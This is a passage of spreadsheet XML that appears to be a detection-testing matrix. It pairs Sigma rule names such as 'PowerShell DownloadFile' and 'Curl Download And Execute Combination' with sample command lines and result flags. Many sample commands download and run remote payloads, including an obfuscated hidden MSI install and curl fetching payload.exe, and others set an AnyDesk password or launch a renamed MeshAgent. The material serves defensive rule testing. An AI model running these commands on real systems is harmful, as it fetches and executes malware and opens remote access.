    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="43" t="n"/>
      <c r="B99" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C99" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D99" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E99" s="4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99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="44" t="n"/>
      <c r="J99" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="43" t="n"/>
      <c r="B100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C100" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D100" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E100" s="4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100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="44" t="n"/>
      <c r="J100" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="43" t="n"/>
      <c r="B101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C101" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D101" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E101" s="4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101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="43" t="n"/>
      <c r="J101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="43" t="n"/>
      <c r="B102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C102" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D102" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E102" s="44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102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="44" t="n"/>
      <c r="J102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="43" t="n"/>
      <c r="B103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C103" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D103" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E103" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="44" t="n"/>
      <c r="J103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="43" t="n"/>
      <c r="B104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C104" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D104" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E104" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="44" t="n"/>
      <c r="J104" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="43" t="n"/>
      <c r="B105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C105" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D105" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E105" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="44" t="n"/>
      <c r="J105" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="43" t="n"/>
      <c r="B106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C106" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D106" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E106" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="43" t="n"/>
      <c r="J106" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C107" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D107" s="44" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E107" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$content = Get-Content C:\Windows\System32
otepad.exe
Invoke-WebRequest  -Uri [http://127.0.0.1](http://127.0.0.1) -Method POST -Body $content}</t>
        </is>
      </c>
      <c r="F107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="43" t="n"/>
      <c r="J107" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C108" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D108" s="44" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E108" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$content = Get-Content C:\Windows\System32
otepad.exe
&amp; 'Invoke-WebRequest' -Uri [http://127.0.0.1](http://127.0.0.1) -Method POST -Body $content}</t>
        </is>
      </c>
      <c r="F108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="44" t="n"/>
      <c r="J108" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C109" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D109" s="44" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E109" s="44" t="inlineStr">
        <is>
          <t>powershell.exe  iwr -URI [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -Outfile C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="44" t="n"/>
      <c r="J109" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K109" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="43" t="n"/>
      <c r="B110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C110" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D110" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E110" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="44" t="n"/>
      <c r="J110" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="43" t="n"/>
      <c r="B111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C111" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D111" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E111" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="44" t="n"/>
      <c r="J111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="43" t="n"/>
      <c r="B112" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C112" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D112" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E112" s="43" t="inlineStr">
        <is>
          <t>powershell /"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F112" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G112" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H112" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="43" t="n"/>
      <c r="J112" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="44" t="n"/>
      <c r="B113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C113" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D113" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E113" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="43" t="n"/>
      <c r="J113" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="44" t="n"/>
      <c r="B114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C114" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D114" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E114" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="44" t="n"/>
      <c r="J114" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="44" t="n"/>
      <c r="B115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C115" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D115" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E115" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="44" t="n"/>
      <c r="J115" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="44" t="n"/>
      <c r="B116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C116" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D116" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E116" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="43" t="n"/>
      <c r="J116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B117" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C117" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D117" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E117" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F117" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G117" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H117" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="43" t="n"/>
      <c r="J117" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="43" t="n"/>
      <c r="B118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C118" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D118" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E118" s="44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118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I118" s="43" t="n"/>
      <c r="J118" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="44" t="n"/>
      <c r="B119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C119" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D119" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E119" s="44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119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I119" s="43" t="n"/>
      <c r="J119" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="44" t="n"/>
      <c r="B120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C120" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D120" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E120" s="44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120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I120" s="43" t="n"/>
      <c r="J120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="43" t="n"/>
      <c r="B121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C121" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D121" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E121" s="44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121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I121" s="43" t="n"/>
      <c r="J121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="43" t="n"/>
      <c r="B122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C122" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D122" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E122" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="43" t="n"/>
      <c r="J122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="43" t="n"/>
      <c r="B123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C123" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D123" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E123" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F123" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G123" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H123" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="43" t="n"/>
      <c r="J123" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="44" t="n"/>
      <c r="B124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_renamed_execution</t>
        </is>
      </c>
      <c r="C124" s="44" t="inlineStr">
        <is>
          <t>Renamed Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D124" s="44" t="inlineStr">
        <is>
          <t>2cf29f11-e356-4f61-98c0-1bdb9393d6da</t>
        </is>
      </c>
      <c r="E124" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "notepad.exe"</t>
        </is>
      </c>
      <c r="F124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="44" t="n"/>
      <c r="J124" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="44" t="n"/>
      <c r="B125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli</t>
        </is>
      </c>
      <c r="C125" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Piped Password Via CLI</t>
        </is>
      </c>
      <c r="D125" s="44" t="inlineStr">
        <is>
          <t>b1377339-fda6-477a-b455-ac0923f9ec2c</t>
        </is>
      </c>
      <c r="E125" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c"echo(J9kzQ2Y0qO|anydesk --set-password"</t>
        </is>
      </c>
      <c r="F125" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G125" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H125" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="43" t="n"/>
      <c r="J125" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K125" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="44" t="n"/>
      <c r="B126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C126" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D126" s="44" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E126" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "svchost.exe --m^eshServiceName"</t>
        </is>
      </c>
      <c r="F126" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G126" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H126" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="43" t="n"/>
      <c r="J126" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K126" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C127" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D127" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E127" s="44" t="inlineStr">
        <is>
          <t>wmic path Win32_UserAccount where name='guest' set passwordexpires=false</t>
        </is>
      </c>
      <c r="F127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="44" t="n"/>
      <c r="J127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="43" t="n"/>
      <c r="B128" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_file_download</t>
        </is>
      </c>
      <c r="C128" s="43" t="inlineStr">
        <is>
          <t>File Download with Headless Browser</t>
        </is>
      </c>
      <c r="D128" s="43" t="inlineStr">
        <is>
